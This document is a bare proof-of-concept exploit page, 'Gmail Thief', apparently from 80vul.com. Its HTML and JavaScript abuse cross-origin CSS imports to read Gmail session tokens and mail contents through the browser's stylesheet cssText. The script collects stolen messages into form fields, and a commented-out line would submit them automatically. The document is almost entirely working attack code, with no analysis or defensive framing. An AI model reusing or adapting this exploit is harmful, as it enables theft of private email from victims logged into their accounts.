Gmail JSON Hijacking Proof Of Concept

`<html>  
<head>  
<title>Gmail Thief by 80vul.com</title>  
<meta http-equiv="content-type" content="text/html; charset=UTF-8">  
<style type="text/css">@import url("http://www.google.com/ig#restore");</style>  
<style type="text/css"></style>  
<style type="text/css"></style>  
</head>  
<body>  
<textarea rows="20" cols="80" id="gnewsssrc"></textarea>   
<input type="text" size="50" id="gdskey">  
<iframe width="620" height="300" id="gdspage"></iframe>  
  
<form name="sendmail" ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">   
<input type="text" size="50" id="whom">  
<textarea rows="20" cols="80" id="gdsresult1" name="gdsresult1" ></textarea>  
<textarea rows="20" cols="80" id="gdsresult2" name="gdsresult2" ></textarea>  
<input VALUE="ok" TYPE="submit">   
</form>   
  
<script>  
function showMail(gt){  
var w = document.styleSheets(0).imports(1).cssText;  
var re = new RegExp("account_idx3d(.+?)\"");  
var reRes = re.exec(w);  
if (reRes){  
document.getElementById("whom").innerText = reRes[1];  
}  
  
var e = document.styleSheets(0).imports(2).cssText.split("e:");  
  
for(i=0;i<e.length;i++){  
var re = new RegExp("\"(.+?)\"");  
var reRes = re.exec(e[i]);  
if (reRes)  
{  
if(reRes[1].length==16){  
var gmURL = "https://mail.google.com/mail/ig/mailjson?gt="+gt+"&th="+reRes[1];  
if (document.styleSheets(1).imports.length<30){  
  
document.styleSheets(1).addImport(gmURL);   
}else{  
document.styleSheets(2).addImport(gmURL);   
}   
}  
}  
}  
  
setTimeout('getMail()',5000);  
//setTimeout('document.sendmail.submit();',5000);  
}  
  
  
function getMail(){  
var mail;  
for(j=0;j<document.styleSheets(1).imports.length;j++){  
mail =mail+ document.styleSheets(1).imports(j).cssText;  
}  
document.getElementById("gdsresult1").innerText = escape(mail);   
}  
  
function showResults()  
{  
var re = new RegExp("gt=(.+?)&'");  
var reRes = re.exec(document.styleSheets(0).imports(1).cssText);  
if (reRes)  
{  
var mURL = "https://mail.google.com/mail/ig/mailjson?url=http%3A//www.google.com/ig&lbl=^i&val=50&st=0&vw=max&gt="+reRes[1];  
var gt=reRes[1];  
document.styleSheets(0).addImport(mURL);  
setTimeout('showMail("'+gt+'")', 5000);  
}  
  
}  
  
var re = new RegExp("x26gacjx3d(.+?)x26fppx3d");  
var reRes = re.exec(document.styleSheets(0).imports(0).cssText);  
  
if (reRes)  
{  
document.getElementById("gdskey").innerText = reRes[1];   
var searchURL = "https://mail.google.com/mail/ig/mailhome?gacj="+reRes[1];  
document.styleSheets(0).addImport(searchURL);  
document.getElementById("gdspage").src = searchURL;  
setTimeout('showResults()', 5000);  
}  
else  
{  
document.getElementById("gdskey").innerText = "";  
document.getElementById("gdsresult").innerText = "";  
}  
  
</script>  
  
</body>  
  
</html>  
`